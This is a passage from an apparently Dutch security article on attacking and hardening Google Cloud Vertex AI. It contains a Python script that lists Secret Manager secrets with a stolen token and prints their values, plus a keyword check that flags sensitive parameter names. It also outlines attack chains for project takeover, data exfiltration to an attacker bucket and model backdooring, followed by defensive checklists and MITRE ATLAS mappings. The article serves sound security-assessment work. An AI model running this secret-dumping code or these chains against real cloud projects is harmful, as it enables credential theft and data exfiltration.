                    value_str = str(param_value)[:100]
                    print(f"  Param: {param_name} = {value_str}")
                    if any(kw in param_name.lower() for kw in
                           ['key', 'secret', 'token', 'password']):
                        print(f"    [!] Potentially sensitive parameter")
 
    # Also check Vertex AI Metadata Store for experiment tracking
    print("\n=== Metadata Store (Experiments) ===")
    for experiment in aiplatform.Experiment.list():
        print(f"Experiment: {experiment.name}")

5. Exploitatie van Secret Manager

GCP Secret Manager is de aanbevolen manier om credentials op te slaan, maar Vertex AI-serviceaccounts kunnen te brede toegang hebben tot secrets buiten wat ML-workflows vereisen.

import requests
 
def enumerate_secrets(token, project_id):
    """Enumerate and attempt to access Secret Manager secrets."""
    headers = {"Authorization": f"Bearer {token}"}
 
    # List all secrets
    url = (
        f"https://secretmanager.googleapis.com/v1/projects/{project_id}"
        f"/secrets"
    )
    resp = requests.get(url, headers=headers)
    secrets = resp.json().get('secrets', [])
 
    for secret in secrets:
        secret_name = secret['name'].split('/')[-1]
        print(f"\nSecret: {secret_name}")
        print(f"  Created: {secret.get('createTime')}")
        labels = secret.get('labels', {})
        print(f"  Labels: {labels}")
 
        # Attempt to access the latest version
        version_url = (
            f"https://secretmanager.googleapis.com/v1/"
            f"{secret['name']}/versions/latest:access"
        )
        version_resp = requests.get(version_url, headers=headers)
        if version_resp.status_code == 200:
            import base64
            payload = version_resp.json()['payload']['data']
            decoded = base64.b64decode(payload).decode('utf-8', errors='replace')
            print(f"  [!] Accessible - Value: {decoded[:50]}...")
        else:
            print(f"  Access denied ({version_resp.status_code})")

Checklist voor defensieve beoordeling

Controlegebied	Wat te verifiëren	MITRE ATLAS-referentie
Serviceaccounts	Rollen met minimale privileges, geen `Editor` of `Owner` op Workbench-SA's	AML.T0003 (ML Model Access)
Metadataserver	Aangepaste metadata-attributen bevatten geen secrets	AML.TA0008 (Collection)
Netwerk	VPC Service Controls, Private Google Access, geen publieke IP's op Workbench	AML.T0002 (Active Scanning)
GCS	Uniforme toegang op bucketniveau, geen `allUsers`-bindingen, encryptie	AML.T0000 (Search for Data)
Endpoints	Alleen IAM-authenticatie, geen bindingen voor publieke toegang	AML.T0003 (ML Model Access)
Secrets	Begrensde Secret Manager-toegang, audit logging	AML.TA0008 (Collection)
Pipelines	Pipeline-SA gescheiden van Workbench-SA, geen secrets in parameters	AML.T0018 (Backdoor ML Model)
Logging	Cloud Audit Logs ingeschakeld, Data Access-logs voor GCS en BigQuery	AML.TA0006 (Defense Evasion)

Aanbevolen verharding

Gebruik toegewijde serviceaccounts per Workbench-instance met alleen de IAM-rollen die nodig zijn voor het werk van die gebruiker, nooit Editor of Owner.
Schakel VPC Service Controls in om een beveiligingsperimeter rond ML-resources te creëren, waardoor data-exfiltratie zelfs met geldige credentials wordt voorkomen.
Gebruik waar mogelijk Workload Identity Federation in plaats van serviceaccountsleutels.
Schakel Cloud Audit Logs in met Data Access-logging voor GCS-, BigQuery- en Vertex AI-API-aanroepen.
Verwijder publieke IP's van Workbench-instances en gebruik IAP-tunnels (Identity-Aware Proxy) voor toegang.
Dwing organisatiebeleid af zoals constraints/iam.disableServiceAccountKeyCreation en constraints/compute.requireShieldedVm.
Gebruik Customer-Managed Encryption Keys (CMEK) voor GCS-buckets, BigQuery-datasets en Vertex AI-resources.
Implementeer VPC-SC ingress/egress-regels om te beperken welke identiteiten en services toegang hebben tot de ML-perimeter.

Veelvoorkomende aanvalsketens

Keten 1: Van Workbench tot projectovername

1. Initial access via compromised user credentials or malicious notebook
2. Extract service account token from GCP metadata server
3. Discover the SA has Editor role on the project (common misconfiguration)
4. Enumerate all project resources: GCS, BigQuery, Compute Engine, GKE
5. Access Secret Manager to extract API keys and database credentials
6. Test service account impersonation for SAs in other projects
7. If impersonation succeeds, pivot to other projects in the organization

Keten 2: Op pijplijnen gebaseerde data-exfiltratie

1. Access Vertex AI Pipelines via compromised service account
2. Extract pipeline templates to understand data flow
3. Identify GCS buckets and BigQuery tables used for training data
4. Access training datasets containing PII or proprietary data
5. Exfiltrate data to attacker-controlled GCS bucket (if VPC-SC absent)
6. Use extracted data for model replication or competitive intelligence

Keten 3: Manipulatie van modelartefacten

1. Enumerate GCS buckets containing model artifacts
2. Download the production model artifact
3. Inject a backdoor (e.g., trojan trigger in the model weights)
4. Upload modified artifact to the same GCS path
5. If model versioning is not enforced, the next deployment loads the
   backdoored model
6. Backdoor activates on specific trigger inputs in production

GCP-specifieke risico's

GCP presenteert verschillende unieke risico's vergeleken met AWS en Azure in de context van ML-beveiliging:

GCP-specifiek risico	Beschrijving	Mitigatie
Standaard Compute Engine-SA	Vertex AI gebruikt mogelijk het standaard CE-serviceaccount, dat `Editor` op het project heeft	Maak toegewijde SA's met minimale rollen
Lacunes in organisatiebeleid	Organisatiebeleid dekt mogelijk geen Vertex AI-specifieke resources	Breid organisatiebeleid uit om `aiplatform.*`-constraints te dekken
VPC-SC-complexiteit	VPC Service Controls zijn krachtig maar complex; verkeerd geconfigureerde perimeters creëren een vals gevoel van veiligheid	Regelmatige audits van VPC-SC-configuratie
BigQuery-integratie	Vertex AI Feature Store gebruikt BigQuery, dat niet-ML gevoelige data kan bevatten	Aparte BigQuery-datasets voor ML-features
Gedeelde repo's in Artifact Registry	ML-containerimages kunnen repo's delen met niet-ML-containers	Toegewijde repo's voor ML-images met strikte IAM

MITRE ATLAS-koppeling voor Vertex AI-aanvallen

Aanvalstechniek	ATLAS-ID	Vertex AI-specifieke context
Tokenextractie via metadataserver	AML.TA0002 (Initial Access)	Workbench-serviceaccount met brede projecttoegang
GCS-data-enumeratie	AML.T0000 (Search for Victim's Data)	ML-buckets zijn vindbaar via labels en naamgeving
Endpoint-sondering	AML.T0002 (Active Scanning)	Vertex AI-endpoints kunnen publieke IAM-bindingen hebben
Modelextractie via voorspellings-API	AML.T0024 (Model Extraction)	Aanvallen met hoog queryvolume via Vertex AI Prediction
Manipulatie van pijplijnartefacten	AML.T0018 (Backdoor ML Model)	GCS-modelartefacten zijn wijzigbaar als bucket-IAM zwak is
Feature Store-vergiftiging	AML.T0020 (Data Poisoning)	Wijziging van BigQuery/Bigtable-featuredata

Verwante onderwerpen

Cloud-AI-infrastructuur -- Platformoverkoepelend overzicht
AWS SageMaker -- AWS-vergelijking
Azure ML -- Azure-vergelijking

Referenties

Google Cloud Vertex AI Security Overview - Google Cloud (2024) - Officiële documentatie over de beveiligingsarchitectuur
"GCP Service Account Best Practices" - Google Cloud (2024) - Het beperken van de scope van serviceaccounts en sleutelbeheer
"Securing AI Workloads on Google Cloud" - Google Cloud Architecture Center (2024) - Architectuurpatronen voor ML-beveiliging
"BeyondProd: A New Approach to Cloud-Native Security" - Google (2019) - Fundamenten van het GCP-beveiligingsmodel

Knowledge Check

Wat is het primaire pad voor laterale beweging vanaf een gecompromitteerde Vertex AI Workbench-instance?

GCP Vertex AI-aanvalsoppervlak

Gerelateerde artikelen

GCP Vertex AI-aanvalsoppervlak

Gerelateerde artikelen